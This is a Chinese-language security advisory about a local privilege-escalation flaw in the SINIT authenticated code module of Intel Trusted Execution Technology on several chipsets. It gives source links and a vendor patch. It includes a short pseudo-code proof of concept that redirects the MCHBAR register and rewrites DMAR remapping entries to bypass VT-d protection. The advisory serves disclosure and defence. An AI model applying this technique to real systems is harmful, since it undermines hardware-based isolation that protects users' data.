Intel可信执行技术SINIT ACM本地权限提升漏洞

受影响系统:

Intel Q35
Intel GM45
Intel PM45 Express
Intel Q45
Intel Q43 Express

描述:

英特尔可信执行技术是英特尔酷睿2双核处理器E8400中的一项硬件延展技术,旨在保护虚拟化计算环境中的数据免遭软件攻击、病毒入侵及其它类型威胁。

多个Intel芯片组的SINIT认证代码模块(ACM)中存在错误配置,允许本地用户将MCHBAR寄存器修改为指向受控的区域,在加载MLE期间SENTER指令无法正确地应用VT-d保护,以绕过可信执行技术的保护机制。

<*来源:Alexander Tereshkin
  
  链接:
http://secunia.com/advisories/37900/
        http://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00021&languageid=en-fr
        http://invisiblethingslab.com/resources/misc09/Another%20TXT%20Attack.pdf
*>

测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

#define ETH_MEM 0xfef00000
#define FAKE_MCHBAR (ETH_MEM+0x10000)
#define NEW_MCHBAR ((1ULL<<32) +
FAKE_MCHBAR)
// map some memory above 0xfec00000…
pci_write_long (ETH_DEV, MBARA_REG,
ETH_MEM)
// copy original MCHBAR region there…
MCHBAR = pci_read_long (MCH_DEV,
MCHBAR_REG);
memcpy (FAKE_MCHBAR, MCHBAR&~1, 0x4000);
// do the trick!
DMAR = get_acpi_dmar_base();
DMAR.DRHD[3].BAR = DMAR.DRHD[0].BAR
*(FAKE_MCHBAR + 0xdc0) = DMAR.DRHD[3].BAR
// update MCHBAR…
pci_write_longlong (MCH_DEV, MCHBAR_REG,
NEW_MCHBAR | 0x1)

建议:

厂商补丁:

Intel
—–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://sourceforge.net/projects/tboot/files/